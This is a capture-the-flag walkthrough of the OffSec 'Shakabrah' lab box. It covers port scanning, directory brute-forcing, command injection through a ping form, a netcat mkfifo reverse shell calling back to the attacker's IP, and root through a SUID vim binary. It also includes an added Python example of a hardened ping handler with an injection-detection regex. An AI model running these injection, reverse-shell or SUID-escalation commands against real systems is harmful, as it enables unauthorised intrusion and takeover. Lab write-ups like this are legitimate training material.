Shakabrah Walkthrough OffSec
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researcher || TryHackMe Top 1% || Programming C, Python || Bug Bounty ||
In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide covers the essential stages from reconnaissance to privilege escalation, providing a clear path to capturing the flags.
Rustscan: Identify open ports and services.
rustscan -a 192.168.158.86 -- -A
HTTP Service: Explore the website manually.
Directory Bruteforcing: Discover hidden directories.
gobuster dir -u https://192.168.158.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
From here, we can attempt to gain RCE by exploring the interface's capabilities. Instead of fuzzing to discover which commands we can execute—though that is a valuable exercise on its own—we can manually investigate. Specifically, we should determine if it allows command chaining.
ping 192.168.158.86;
ping 192.168.158.86;cat /etc/passwd
Now we will try to get RCE using this command injection vulnerability.
Reverse shell payload:
192.168.158.86;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.232 80 >/tmp/f
We get our shell back and now have access as www-data.
The reverse shell one-liner used here is from https://www.revshells.com/
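The ping form's command chaining, shown as an added example that is not the box's own code: the vulnerable way of building the command beside a hardened handler, plus a small check for request logs. The function names and the use of Python's ipaddress module are my assumptions about how such a form could be written.

```python
"""Vulnerable vs. hardened handling of a 'ping this host' web form."""
import ipaddress
import re
import subprocess

# Shell metacharacters that turn one command into a chain, a pipe or a redirection.
_SHELL_META = re.compile(r"[;&|`$><\n(){}]")


def vulnerable_ping_command(target: str) -> str:
    """The bug: the user-supplied host is spliced into a shell command line.

    Everything after ';' becomes a second command, which is exactly what
    'ping 192.168.158.86;cat /etc/passwd' relies on.
    """
    return f"ping -c 1 {target}"  # later executed with shell=True


def hardened_ping_argv(target: str) -> list:
    """Hardened version: allow-list validation plus no shell at all.

    The value must parse as an IP address; anything else is rejected. The
    command is built as an argv list and run with shell=False, so shell
    metacharacters are inert even if validation were somehow bypassed.
    """
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError as exc:
        raise ValueError(f"rejected target {target!r}: not an IP address") from exc
    return ["ping", "-c", "1", str(ip)]


def run_ping(target: str, timeout: float = 5.0) -> int:
    """Run the hardened command; returns ping's exit status (0 = host answered)."""
    argv = hardened_ping_argv(target)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.returncode


def injection_indicators(target: str) -> list:
    """Detection helper for request logs: the metacharacters found in the input."""
    return sorted(set(_SHELL_META.findall(target)))
```

run_ping actually executes ping, so it needs the binary and network access; the other three functions run anywhere.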
Change the directory to /home/dylan, where you'll find a file named local.txt. Use the cat command to read the file and obtain your first flag.
Privilege Escalation:
find / -type f -perm -u=s 2>/dev/null
Here, it shows that vim.basic has the SUID bit set. Checking GTFOBins, we find several exploitation methods. Here is the one I used:
Run /usr/bin/vim.basic, then enter the following inside vim:
:py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")
When reset asks for the terminal type, enter xterm.
cd /root, where proof.txt is located, then simply cat proof.txt to get your root flag.
Great article! Very insightful for both beginners and experienced pen testers. Thanks for sharing! #CyberSecurity #PenTesting #CTF